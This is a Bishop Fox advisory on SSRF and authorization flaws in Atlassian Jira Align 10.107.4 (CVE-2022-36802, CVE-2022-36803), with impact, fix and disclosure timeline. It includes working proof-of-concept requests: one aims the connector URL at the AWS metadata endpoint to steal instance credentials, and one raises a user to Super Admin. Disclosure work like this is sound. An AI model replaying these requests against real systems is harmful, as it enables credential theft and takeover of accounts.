Bishop Fox named “Leader” in 2024 GigaOm Radar for Attack Surface Management. Read the Report ›

Atlassian Jira Align, Version 10.107.4 Advisory

Gauge showing high severity reading

Share

Atlassian Jira Align — VERSION 10.107.4 — ADVISORY SUMMARY

The following document describes identified vulnerabilities in the Jira Align application Version 10.107.4.

Product Vendor

Atlassian

Product Description

Jira Align is an Atlassian software as a service (SaaS) program that allows users to have a scalable Jira solution in the cloud. The project’s official website is https://www.atlassian.com/software/jira/align. The latest version of the application is 10.109.3 and was released on July 22, 2022.

Vulnerabilities List

2 vulnerabilities were identified within the Jira Align application:

  • Server-side Request Forgery (SSRF)
  • Insufficient Authorization Controls

These vulnerabilities are described in the following sections.

Affected Version

Version 10.107.4

Summary of Findings

The first vulnerability is a SSRF in the "Connectors" settings that allows a user to retrieve the AWS credentials of the Atlassian service account that provisioned the Jira Align instance. Additionally, there was a case of Insufficient Authorization Controls in the "People" permission that allows any user with this permission to modify their own role to that of Super Admin.

Impact

For the SSRF, an attacker could exploit this issue to retrieve the AWS credentials of the Atlassian service account that provisioned access to the Jira Align instance. In the case of Insufficient Authorization Controls, a user who exploits this issue could elevate their role to Super Admin, the highest role provisioned in Jira Align for an end user. With access to Super Admin permissions, a malicious user could gain access to all data in Jira Align, modify user or account settings, and modify any security control for the Jira Align instance.

Solution

Update to version 10.109.3 or newer.

Vulnerabilities

Server-Side Request Forgery (SSRF)

The Jira Align application was affected by a Server-side Request Forgery vulnerability that could allow an attacker to retrieve the AWS credentials of the service account that deployed the instance of Jira Align. Due to each instance of Jira Align being provisioned by Atlassian, this attack could potentially be used to gain access to the Atlassian cloud infrastructure by a consumer of Jira Align.

Vulnerability Details

CVE ID: CVE-2022-36802

Vulnerability Type: Other (SSRF)

Access Vector: ☒ Remote, ☐ Local, ☐ Physical, ☐ Context dependent, ☐ Other (if other, please specify)

Impact: ☐ Code execution, ☐ Denial of service, ☐ Escalation of privileges, ☒ Information disclosure, ☐ Other (if other, please specify)

Security Risk: ☐ Critical, ☒ High, ☐ Medium, ☐ Low

Vulnerability: CWE-918

The Jira Align ManageJiraConnectors API that manages external Jira connections to the application is vulnerable to SSRF. An attacker can exploit this issue to return the AWS credentials of the service account that deployed the instance of Jira Align.

The identified endpoint required a user-supplied parameter called txtAPIURL, which was a URL value that pointed to the desired Jira API location. Jira Align automatically appended the standard API /rest/api/2/ to the URL server side but could be bypassed by adding a single # symbol to the end of the URL, which would allow an attacker to specify any URL for the Jira connector.

To exploit this, an attacker could specify the AWS metadata endpoint in the txtAPIURL parameter, as shown below:

Request:

POST /ManageJiraConnectors HTTP/1.1
Host: amertrial317.jiraalign.com
…omitted for brevity…
cmbJiraConnectorID=1&txtURL1=https%3A%2F%2Fone-atlas-demo-
1.atlassian.net%2Fbrowse%2F%7Bexternal%7D&txtConnectorName1=Partner+Connector&txtConnectorAdmin1=1190&
txtAPIURL1=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-
credentials%2FLP-USE2-MULTI-2-CON-B6-AZ2-InstanceRole-1QX59D6VM44H6%23&ddlAuthType1=0&txtAPIEMAN1=&txtAPIDROWSSAP1=&txtOACK1=&txtOAPuK1=&btnUpdateConnectors=Save&__STATE=W5DLrMbpCpgsEfqmIeYAizIRcWv1khjXXchwHRr6%2Fww%3D

Response:

HTTP/1.1 302 Found
Date: Thu, 26 May 2022 21:34:34 GMT
Content-Type: text/html; Charset=utf-8
Connection: close
Location: ManageJiraConnectors?i=1
…omitted for brevity…
Server: cloudflare
Content-Length: 145
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>
</a>.</body>

After activating the connector, Jira Align reached out to the Jira API URL and returned the full body of the response to the URL in the Jira Change Log:

AWS credentials of user LP-USE2-MULTI-2-CON-B6-AZ2-InstanceRole-1QX59D6VM44H6 returned in Jira Change Log

FIGURE 1 - AWS credentials of user LP-USE2-MULTI-2-CON-B6-AZ2-InstanceRole-1QX59D6VM44H6 returned in Jira Change Log

The impact to Atlassian's AWS infrastructure with the LP-USE2-MULTI-2-CON-B6-AZ2-InstanceRole-1QX59D6VM44H6 user could not be determined due to restrictions in the agreement between Atlassian and Bishop Fox's client. It was also not possible to establish whether further access could be gained to the Atlassian infrastructure through privilege escalation or lateral movement with the account.

Insufficient Authorization Controls

The Jira Align application was affected by an insufficient authorization control vulnerability that allowed users provisioned with the People role permission to elevate any user’s role, including their own, to Super Admin. Due to Jira Align being tailored to the end user’s needs, the exact role this permission is applied to varies. In the sandbox environment that was provisioned for testing purposes, this permission was added to the Program Manager role, but could be exploited by any role with the People permission. With Super Admin access to the application, a user has control over any settings in the Jira Align tenant, including modifying Jira connections, resetting user accounts, or modifying any security settings.

Vulnerability Details

CVE ID: CVE-2022-36803

Vulnerability Type: Incorrect Access Control

Access Vector: ☒ Remote, ☐ Local, ☐ Physical, ☐ Context dependent, ☐ Other (if other, please specify)

Impact: ☐ Code execution, ☐ Denial of service, ☒ Escalation of privileges, ☐ Information disclosure, ☐ Other (if other, please specify)

Security Risk: ☐ Critical, ☒ High, ☐ Medium, ☐ Low

Vulnerability: CWE-284, CWE-285

An authenticated attacker with the People role permission can use the MasterUserEdit API to modify any user’s role, including their own, to Super Admin. In the sandbox environment that was designed for testing, the People permission was added to the Program Manager role. However, any role provisioned to Jira Align with only the People role permission can exploit this vulnerability.

In the example below, the user was given the Program Manager role. However, testing was performed with a customized role with only the People role permission enabled and the issue was successfully exploited. If a user can modify other user roles via the front-end GUI of Jira Align, the option to change the user to the Super Admin role will not be available. Nonetheless, intercepting the role change request directly to the API and modifying the cmbRoleID parameter to 9 will allow the request to be completed. Additionally, without the ability to modify roles using the front-end GUI of Jira Align, if the user is given the People permission, they can successfully perform the API call with a POST request containing their session cookies:

Request:

POST /MasterUserEdit HTTP/1.1
Host: amertrial317.jiraalign.com
…omitted for brevity…
btnSubmit=Save&txtStatus=Active&txtStartDate=5%2F25%2F2022&txtEndDate=&rbIsInternal=0&
txtUID=1209&txtExternalID=&txtFirst=Johnny&txtLast=TesterChangeMe&txtEmail=jashafer%2B
rolechange%40ebay.com&txtTitle=Mr.+Changeme&cmbRoleID=9&cmbDivision=16&cmbRegion=1&cmb
City=14&cmbCostCenter=3&cmbTimeZoneID=Turks+And+Caicos+Standard+Time&cmbPublicER=0&txt
Notes=%60%60%0D%0A'%0D%0A%22%0D%0A%7B%7D%0D%0A%7B%7B2*2%7D%7D%0D%0A%7B3*3%7D%0D%0A%22%
3Ch1%3Eabc%3C%2Fh1%3E&rbTimeType=1&UNIQ=1209

Response: 

HTTP/1.1 302 Found
Date: Thu, 26 May 2022 14:48:18 GMT
Content-Type: text/html; Charset=utf-8
Connection: close
Location: MasterUserEdit?Uniq=1209
…omitted for brevity…
Content-Length: 145
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>
</a>.</body>

After sending the request, the targeted user would be forced to log out of the application. After logging in again, the user would then have the Super Admin role, allowing them to modify any aspect of the Jira Align tenant such as modifying Jira connections, resetting user accounts, or modifying security settings.

CREDITS

    TIMELINE

    • 05/31/2022: Initial discovery
    • 06/06/2022: Contact with vendor
    • 06/08/2022: Vendor acknowledged vulnerabilities
    • 06/28/2022: Vendor released patched hotfix version 10.108.3.5 (SSRF)
    • 07/22/2022: Vendor released patched version 10.109.3
    • 10/14/2022: Vulnerabilities publicly disclosed

    Subscribe to Bishop Fox's Security Blog

    Be first to learn about latest tools, advisories, and findings.


    Jake Shaffer Headshot

    About the author, Jake Shafer

    Senior Security Consultant III

    Jake Shafer is a Senior Security Consultant III at Bishop Fox. He currently focuses on Application Penetration Testing and Hybrid Application Assessments; however, he has previous offensive security experience in external and internal penetration testing. Jake is known for his expertise in web application security, source code review, server-side request forgery (SSRF), cross-site scripting (XSS), and web application authorization controls.

    Jake earned a B.S. in Information Technology from the University of North Texas (UNT). He enjoys helping others break into the offensive security world and has presented on this topic at the UNT Cybersecurity Club.

    More by Jake

    This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.